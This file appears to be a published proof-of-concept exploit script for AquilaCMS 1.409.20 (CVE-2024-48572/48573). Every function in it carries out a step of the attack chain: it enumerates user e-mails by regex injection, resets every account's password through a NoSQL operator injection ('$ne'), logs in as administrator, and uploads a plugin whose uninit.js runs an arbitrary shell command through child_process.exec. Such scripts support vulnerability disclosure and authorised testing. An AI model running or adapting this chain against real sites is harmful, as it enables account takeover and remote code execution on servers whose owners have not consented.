# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573
#
# NOTE: proof-of-concept for security testing. Run it only against systems
# you own or are explicitly authorised to assess: it changes account
# passwords and executes a command on the target.

import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap

# Bracket-escaped tokens used while probing e-mail addresses, paired with the
# literal character each one stands for.  The order is significant only in
# that it is kept identical for probing and for un-escaping.
_ESCAPED_SPECIALS = (
    ("[$]", "$"),
    ("[*]", "*"),
    ("[+]", "+"),
    ("[-]", "-"),
    ("[.]", "."),
    ("[?]", "?"),
    (r"[\^]", "^"),
    ("[|]", "|"),
)


def unescape_special_characters(email: str) -> str:
    """Return *email* with every bracket-escaped token replaced by its literal.

    The tokens are those listed in ``_ESCAPED_SPECIALS`` (for example
    ``"[.]"`` becomes ``"."``).  Replacements are applied one after another in
    table order.
    """
    for escaped, literal in _ESCAPED_SPECIALS:
        email = email.replace(escaped, literal)
    return email


def get_user_emails():
    """Enumerate e-mail addresses by extending prefixes one character at a time.

    For each candidate prefix a ``PUT {args.url}/api/v2/user`` request is sent
    with the e-mail field set to ``<prefix>.*``.  A JSON response whose
    ``code`` is ``"UserAlreadyExist"`` keeps the prefix for the next round;
    a prefix that cannot be extended by any character is recorded as a result.
    Presumably the server evaluates the value as a regular expression, which
    is why prefixes start with ``^`` -- not verifiable from this file.

    Returns:
        list of the recorded addresses, still in bracket-escaped form and
        without the leading ``^``.

    Reads the module-level ``args`` (``args.url``).
    """
    valid_characters = list(
        string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
    ) + [escaped for escaped, _ in _ESCAPED_SPECIALS]

    emails_found = []
    next_emails = ["^"]

    while next_emails:
        prev_emails = next_emails
        next_emails = []

        for email in prev_emails:
            found = False

            for ch in valid_characters:
                data = {"email": f"{email + ch}.*"}
                res = requests.put(f"{args.url}/api/v2/user", json=data)

                if json.loads(res.text)["code"] == "UserAlreadyExist":
                    next_emails.append(email + ch)
                    found = True

            if not found:
                # No character extends this prefix; drop the leading "^".
                emails_found.append(email[1:])
                print(f"[+] {unescape_special_characters(email[1:])}")

    return emails_found


def reset_password(email: str) -> None:
    """Send the two password-reset requests for *email* and print the result.

    The first POST carries only the e-mail.  The second POST carries a
    ``token`` of ``{"$ne": None}`` together with ``args.password``; note that
    its body does not contain the e-mail at all.  Presumably the operator
    object matches any stored non-null token -- TODO confirm against the
    server implementation.

    Neither response is inspected, so the printed line does not prove that
    the reset took effect.
    """
    endpoint = f"{args.url}/api/v2/user/resetpassword"

    data = {"email": email}
    requests.post(endpoint, json=data)

    data = {"token": {"$ne": None}, "password": args.password}
    requests.post(endpoint, json=data)

    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    """Return the login token of the first address accepted by the admin login.

    Each address in *emails* is posted with ``args.password`` to
    ``/api/v2/auth/login/admin``.  On the first HTTP 200 the ``data`` field of
    the JSON response is returned; ``None`` is returned when no login
    succeeds.
    """
    for email in emails:
        data = {"username": email, "password": args.password}
        res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)

        if res.status_code == 200:
            print(f"[+] Administrator account : {unescape_special_characters(email)}")
            return json.loads(res.text)["data"]

    return None


def create_plugin(plugin_name: str) -> io.BytesIO:
    """Build an in-memory zip archive for a plugin named *plugin_name*.

    The archive contains ``package.json``, ``info.json`` and ``uninit.js``
    under a ``<plugin_name>/`` directory.  ``uninit.js`` embeds
    ``args.command`` verbatim inside a double-quoted JavaScript string, so a
    command containing ``"`` or ``\\`` yields different JavaScript than
    intended.

    Returns:
        a ``BytesIO`` positioned at offset 0, ready to be uploaded.
    """
    payload = textwrap.dedent(
        f"""
        const {{ exec }} = require("child_process");

        /**
         * This function is called when the plugin is desactivated or when we delete it
         */
        module.exports = async function (resolve, reject) {{
            try {{
                exec("{args.command}");
                return resolve();
            }} catch (error) {{}}
        }};
        """
    ).strip()

    plugin = io.BytesIO()
    with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
        # writestr() accepts bytes directly; no intermediate buffer is needed.
        zip_file.writestr(
            f"{plugin_name}/package.json",
            f'{{ "name": "{plugin_name}" }}'.encode(),
        )
        zip_file.writestr(f"{plugin_name}/info.json", b'{ "info": {} }')
        zip_file.writestr(f"{plugin_name}/uninit.js", payload.encode())

    plugin.seek(0)
    return plugin


def rce(emails) -> None:
    """Log in as an administrator, upload a plugin and toggle it inactive.

    Steps, each announced on stdout:

    1. obtain a token via ``get_admin_auth_token`` (abort if ``None``);
    2. build a plugin with a random hex name via ``create_plugin``;
    3. POST it to ``/api/v2/modules/upload``;
    4. list modules via ``/api/v2/modules`` and find the one whose ``name``
       equals the plugin name (abort if absent);
    5. POST ``{"idModule": ..., "active": False}`` to
       ``/api/v2/modules/toggle``.

    Success is reported purely from the HTTP status of step 5; the command's
    own outcome is not observed.
    """
    auth_token = get_admin_auth_token(emails)
    if auth_token is None:
        print("[-] Administrator account not found")
        return

    # The same authorisation header is used for every request below.
    headers = {"Authorization": auth_token}

    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    plugin = create_plugin(plugin_name)

    print("[+] Upload plugin")
    files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
    requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)

    print("[+] Find uploaded plugin")
    data = {"PostBody": {"limit": 0}}
    res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)

    plugin_id = None
    for module in json.loads(res.text)["datas"]:
        if module["name"] == plugin_name:
            plugin_id = module["_id"]
            print(f"[+] Plugin ID : {plugin_id}")
            break

    if plugin_id is None:
        print("[-] Plugin not found")
        return

    print("[+] Deactivate plugin")
    data = {"idModule": plugin_id, "active": False}
    res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)

    if res.status_code == 200:
        print("[+] Command execution succeeded")
    else:
        print("[-] Command execution failed")


def main() -> None:
    """Run the three stages in order: enumerate, reset passwords, execute."""
    print("[*] Retrieve email addresses")
    emails = get_user_emails()

    print("\n[*] Reset password")
    for email in emails:
        reset_password(email)

    print("\n[*] Perform remote code execution")
    rce(emails)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()

    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL (e.g. www.aquila-cms.com)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )

    # `args` is intentionally module-level: every function above reads it.
    args = parser.parse_args()

    main()